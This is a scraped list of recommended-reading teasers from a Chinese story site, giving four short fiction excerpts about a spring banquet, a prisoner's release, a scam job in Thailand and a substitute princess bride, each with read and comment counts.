  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,953评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,195评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 44,907评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,472评论 2 342

推荐阅读更多精彩内容